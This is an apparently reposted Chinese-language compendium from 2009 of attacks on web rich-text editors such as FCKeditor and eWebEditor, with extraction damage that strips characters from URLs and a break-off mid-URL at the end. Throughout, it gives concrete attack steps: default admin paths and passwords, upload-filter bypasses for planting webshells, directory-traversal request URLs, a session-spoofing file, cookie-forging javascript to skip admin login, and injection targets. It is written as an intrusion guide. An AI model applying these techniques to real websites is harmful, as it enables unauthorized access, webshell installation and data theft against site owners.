【Jsp精品源码栏目提醒】:网学会员鉴于大家对Jsp精品源码十分关注,论文会员在此为大家搜集整理了“【精品】网页编辑器漏洞大全 - 互联网”一文,供大家参考学习
网页编辑器漏洞大全涵盖了诸如常见的 FCKeditor、eWebEditor、Cuteditor、Freetextbox、Webhtmleditor、Kindeditor、所谓的 eWebEditorNET、所谓的 southidceditor、所谓的 bigcneditor …BY:Hell-Phantom2009-11-7目录FCKeditor.................................................................................................................................................. 3FCKeditor 编辑器页/查看编辑器版本/查看文件上传路径 .............................................................. 3FCKeditor 被动限制策略所导致的过滤不严问题 .............................................................................. 3利用 2003 路径解析漏洞上传网马 ..................................................................................................... 3FCKeditor PHP 上传任意文件漏洞 ....................................................................................................... 4TYPE 自定义变量任意上传文件漏洞 .................................................................................................. 4FCKeditor 新闻组件遍历目录漏洞 ...................................................................................................... 4FCKeditor 中 webshell 的其他上传方式 .............................................................................................. 5FCKeditor 文件上传“.”变“_”下划线的绕过方法: ................................................................. 5eWebEditor .............................................................................................................................................. 6eWebEditor 利用基础知识 .................................................................................................................... 6ewebeditor 踩脚印式入侵 .................................................................................................................... 6ewebeditor 遍历目录漏洞 .................................................................................................................... 7ewebeditor 5.2 列目录漏洞 ................................................................................................................. 7利用 WebEditor session 欺骗漏洞进入后台 ...................................................................................... 7ewebeditor asp 版 2.1.6 上传漏洞 ..................................................................................................... 7eWebEditor 2.7.0 注入漏洞 .................................................................................................................. 7Ewebeditor2.8.0 最终版删除任意文件漏洞 ....................................................................................... 8ewebeditor v6.0.0 上传漏洞 ................................................................................................................ 8eWebEditor PHP/ASP…后台通杀漏洞 ................................................................................................. 8eWebEditor
JSP 版漏洞 .......................................................................................................................... 8eWebEditorNet upload.aspx 上传漏洞就是 EWEB 的 ASPX 版而已不是其他的编辑器 ...........9southidceditor还是 eWeb 核心,一般使用 v2.8.0 版..................................................................... 9bigcneditor ............................................................................................................................................... 9Cute Editor .............................................................................................................................................10Cute Editor 在线编辑器本地包含漏洞 ..............................................................................................10Webhtmleditor ......................................................................................................................................10利用 WIN 2003 IIS 文件名称解析漏洞获得 SHELL ...........................................................................10Kindeditor ..............................................................................................................................................10与 Webhtmleditor 同样的问题 ...........................................................................................................10Freetextbox ............................................................................................................................................11Freetextbox 遍历目录漏洞 ..................................................................................................................11附录 C 包含一份未完善的小字典FCKeditor FCKeditor 编辑器页/查看编辑器版本/查看文件上传路径FCKeditor 编辑器页FCKeditor/_samples/default.html查看编辑器版本 批注 Hell1: 截至 09 年 8 月 4 日最新FCKeditor/_whatsnew.html 版本为 FCKeditor v2.6.4.1查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.aspCommandGetFol 批注 Hell2: 记得修改其中两处 aspdersAndFilesampTypeImageampCurrentFolder/ 为 FCKeditor 实际使用的脚本语言XML 页面中第二行 “url/xxx”的部分就是默认基准上传路径 FCKeditor 被动限制策略所导致的过滤不严问题影响版本: FCKeditor x.x lt FCKeditor v2.4.3脆弱描述:FCKeditor v2.4.3 中 File 类别默认拒绝上传类型:htmlhtmphpphp2php3php4php5phtmlpwmlincaspaspxascxjspcfmcfcplbatexecomdllvbsjsregcgihtaccessasisshshtmlshtmphtmFckeditor 2.0 lt 2.2 允许上传 asa、cer、php2、php4、inc、pwml、pht 后缀的文件 批注 Hell3: 原作:上传后 它保存的文件直接用的sFilePath sServerDir . sFileName,而没有使用sExtension http://superhei.blogbus.com/logs/200为后缀 6/02/1916091.html直接导致在 win 下在上传文件后面加个.来突破未测试而在 apache 下,因为quotApache 文件名解析缺陷漏洞quot也可以利用之,详见quot附录 Aquot另建议其他上传漏洞中定义 TYPE 变量时使用 File 类别来上传文件根据 FCKeditor 的代码,其限制最为狭隘。
攻击利用:允许其他任何后缀上传 利用 2003 路径解析漏洞上传网马影响版本: 附录 B脆弱描述:利用 2003 系统路径解析漏洞的原理,创建类似“bin.asp”如此一般的目录,再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。
攻击利用:fckeditor/editor/filemanager/browser/default/browser.htmlTypeImageampConnectorconnectors/asp/connector.asp 批注 Hell4: 记得修改其中两处 asp 为 FCKeditor 实际使用的脚本语言 FCKeditor PHP 上传任意文件漏洞影响版本: FCKeditor 2.2 lt FCKeditor 2.4.2脆弱描述:FCKeditor 在处理文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件。
在通过 editor/filemanager/upload/php/upload.php 上传文件时攻击者可以通过为 Type 参数定义无效的值导致上传任意脚本。
成功攻击要求 config.php 配置文件中启用文件上传,而默认是禁用的。
攻击利用: 请修改 action 字段为指定网址: 批注 Hell5: 如想尝试 v2.2 版漏洞, 则修改 Type任意值 即可,但注意, 如果换回使用 Media 则必须大写首 字母 M否则 LINUX 下,FCKeditor 会 对文件目录进行文件名校验,不会上 TYPE 自定义变量任意上传文件漏洞 传成功的。
影响版本: 较早版本脆弱描述:通过自定义 Type 变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。
攻击利用:/FCKeditor/editor/filemanager/browser/default/browser.htmlTypeallampConnectorconnectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了,Shell 上传到的默认位置是: 批注 Hell6: 找不见就去本文前面http://www.URL.com/UserFiles/all/1.asp 找,有教如何看默认上传目录的方法quotTypeallquot 这个变量是自定义的在这里创建了 all 这个目录而且新的目录没有上传文件格式的限制.比如输入:/FCKeditor/editor/filemanager/browser/default/browser.htmlType../ampConnectorconnectors/asp/connector.asp网马就可以传到网站的根目录下. FCKeditor 新闻组件遍历目录漏洞影响版本:aspx 版 FCKeditor,其余版本未测试脆弱描述:如何获得 webshell 请参考上文“TYPE 自定义变量任意上传文件漏洞”攻击利用:修改 CurrentFolder 参数使用 ../../来进入不同的目录/browser/default/connectors/aspx/connector.aspxCommandCreateFolderampTypeImageampCurrentFolder../../..2FampNewFolderNameaspx.asp根据返回的 XML 信息可以查看网站所有的目录。
/browser/default/connectors/aspx/connector.aspxCommandGetFoldersAndFilesampTypeImageampCurrentFolder2F FCKeditor 中 webshell 的其他上传方式影响版本:非优化/精简版本的 FCKeditor脆弱描述:如果存在以下文件,打开后即可上传文件。
攻击利用:fckeditor/editor/filemanager/upload/test.htmlfckeditor/editor/filemanager/browser/default/connectors/test.html 批注 Hell7: 云舒牛: FCKeditor 文件上传“.”变“_”下划线的绕过方法: http://pstgroup.blogspot.com/2007/05/ tipsfckeditor.html影响版本: FCKeditor gt 2.4.x脆弱描述:我们上传的文件例如:shell.php.rar 或 shell.php.jpg 会变为 shell_php.jpg 这是新版 FCK 的变化。
攻击利用:提交 1.php空格 就可以绕过去所有的※不过空格只支持 win 系统 nix 是不支持的1.php 和 1.php空格是 2 个不同的文件 FCKeditor 二次上传漏洞影响版本:gt2.4.x 的最新版已修补脆弱描述:来源:T00LS.Net由于 Fckeditor 对第一次上传 123.asp123.jpg 这样的格式做了过滤。
也就是 IIS6 解析漏洞。
上传第一次。
被过滤为 123_asp123.jpg 从而无法运行。
但是第 2 次上传同名文件 123.asp123.jpg 后。
由于”123_asp123.jpg”已经存在。
文件名被命名为 123.asp1231.jpg …… 123.asp1232.jpg 这样的编号方式。
所以。
IIS6 的漏洞继续执行了。
如果通过上面的步骤进行测试没有成功,可能有以下几方面的原因:1.FCKeditor 没有开启文件上传功能,这项功能在安装 FCKeditor 时默认是关闭的。
如果想上传文件,FCKeditor 会给出错误提示。
2.网站采用了精简版的 FCKeditor,精简版的 FCKeditor 很多功能丢失,包括文件上传功能。
3.FCKeditor 的这个漏洞已经被修复。
eWebEditor eWebEditor 利用基础知识默认后台地址:/ewebeditor/admin_login.asp建议最好检测下 admin_style.asp 文件是否可以直接访问默认数据库路径:PATH/db/ewebeditor.mdb PATH/db/db.mdb -- 某些 CMS 里是这个数据库也可尝试 PATH/db/23ewebeditor.mdb -- 某些管理员自作聪明的小伎俩使用默认密码:admin/admin888 或 admin/admin 进入后台,也可尝试 admin/123456 (有些管理员以及一些 CMS,就是这么设置的)点击“样式管理”--可以选择新增样式,或者修改一个非系统样式,将其中图片控件所允许的上传类型后面加上asp、asa、aaspsp 或cer,只要是服务器允许执行的脚本类型即可,点击“提交”并设置工具栏--将“插入图片”控件添加上。
而后--预览此样式,点击插入图片,上传 WEBSHELL,在“代码”模式中查看上传文件的路径。
2、当数据库被管理员修改为 asp、asa 后缀的时候,可以插一句话木马服务端进入数据库,然后一句话木马客户端连接拿下 webshell3、上传后无法执行?目录没权限?帅锅你回去样式管理看你编辑过的那个样式,里面可以 !自定义上传路径的!!4、设置好了上传类型,依然上传不了麽?估计是文件代码被改了,可以尝试设定“远程类型”依照 6.0 版本拿 SHELL 的方法来做(详情见下文↓) ,能够设定自动保存远程文件的类型。
5、不能添加工具栏,但设定好了某样式中的文件类型,怎么办?↓这么办!请修改 action 字段 ewebeditor 踩脚印式入侵脆弱描述:当我们下载数据库后查询不到密码 MD5 的明文时,可以去看看 webeditor_style14这个样式表,看看是否有前辈入侵过 或许已经赋予了某控件上传脚本的能力,构造地址来上传我们自己的 WEBSHELL.攻击利用:比如 ID46 s-name standard1构造 代码: ewebeditor.aspidcontentampstylestandard ID 和和样式名改过后 ewebeditor.aspid46ampstylestandard1 ewebeditor 遍历目录漏洞脆弱描述:ewebeditor/admin_uploadfile.asp过滤不严,造成遍历目录漏洞攻击利用:ewebeditor/admin_uploadfile.aspid14在 id14 后面添加ampdir..再加 ampdir../..ampdirhttp://www..com/../.. 看到整个网站文件了 ewebeditor 5.2 列目录漏洞脆弱描述:ewebeditor/asp/browse.asp过滤不严,造成遍历目录漏洞攻击利用:http://www..com/ewebeditor/asp/browse.aspstylestandard650ampdir…././/.. 利用 WebEditor session 欺骗漏洞进入后台脆弱描述:漏洞文件:Admin_Private.asp只判断了 session,没有判断 cookies 和路径的验证问题。
攻击利用:新建一个 test.asp 内容如下:ltSessionquoteWebEditor_Userquot quot11111111quotgt访问 test.asp,再访问后台任何文件,for example:Admin_Default.asp ewebeditor asp 版 2.1.6 上传漏洞攻击利用:(请修改 action 字段为指定网址) eWebEditor 2.7.0 注入漏洞攻击利用:http://www.网址.com/ewebeditor/ewebeditor.aspidarticle_contentampstylefull_v200默认表名:eWebEditor_System 默认列名:sys_UserName、sys_UserPass,然后利用 nbsi 进行猜解. Ewebeditor2.8.0 最终版删除任意文件漏洞脆弱描述:此漏洞存在于 ExampleNewsSystem 目录下的 delete.asp 文件中,这是 ewebeditor 的测试页面,无须登陆可以直接进入。
攻击利用: 请修改 action 字段为指定网址 ewebeditor v6.0.0 上传漏洞攻击利用:在编辑器中点击“插入图片”--网络--输入你的 WEBSHELL 在某空间上的地址(注:文件名称必须为:xxx.jpg.asp 以此类推…),确定后,点击“远程文件自动上传”控件(第一次上传会提示你安装控件,稍等即可) ,查看“代码”模式找到文件上传路径,访问即可,eweb官方的 DEMO 也可以这么做,不过对上传目录取消掉了执行权限,所以上传上去也无法执行网马. eWebEditor PHP/ASP…后台通杀漏洞影响版本: PHP 3.0 与 asp 2.8 版也通用,或许低版本也可以,有待测试。
攻击利用:进入后台/eWebEditor/admin/login.php随便输入一个用户和密码会提示出错了.这时候你清空浏览器的 url然后输入javascript:alertdocument.cookiequotadminuserquotescapequotadminquotjavascript:alertdocument.cookiequotadminpassquotescapequotadminquotjavascript:alertdocument.cookiequotadminquotescapequot1quot而后三次回车清空浏览器的 URL现在输入一些平常访问不到的文件如../ewebeditor/admin/default.php,就会直接进去。
eWebEditor
JSP 版漏洞 大同小异,我在本文档不想多说了,因为没环境测试,网上垃圾场那么大,不好排查。
批注 Hell8: 哪位大牛告诉我有什么用
JSP 编辑器的我觉得 eweb 会比 FCKeditor 份额少得多。
在 WIN 下可以绿色模拟
JSP 环境的小给出个连接:http://blog.haaker.cn/post/161.html 软件,类似 NetBox、NPMserv 一般的,还有:http://www.anqn.com/zhuru/article/all/2008-12-04/a09104236.shtml 谢谢了! eWebEditorNet upload.aspx 上传漏洞就是 EWEB 的 ASPX 版而已不是其他的编辑器脆弱描述:WebEditorNet 主要是一个 upload.aspx 文件存在上传漏洞。
攻击利用:默认上传地址:/ewebeditornet/upload.aspx可以直接上传一个 cer 的木马如果不能上传则在浏览器地址栏中输入 javascript:lbtnUpload.click成功以后查看源代码找到 uploadsave 查看上传保存地址,默认传到 uploadfile 这个文件夹里。
southidceditor还是 eWeb 核心,一般使用 v2.8.0 版http://www.网址.com/admin/southidceditor/datas/southidceditor.mdbhttp://www.网址.com/admin/southidceditor/ad.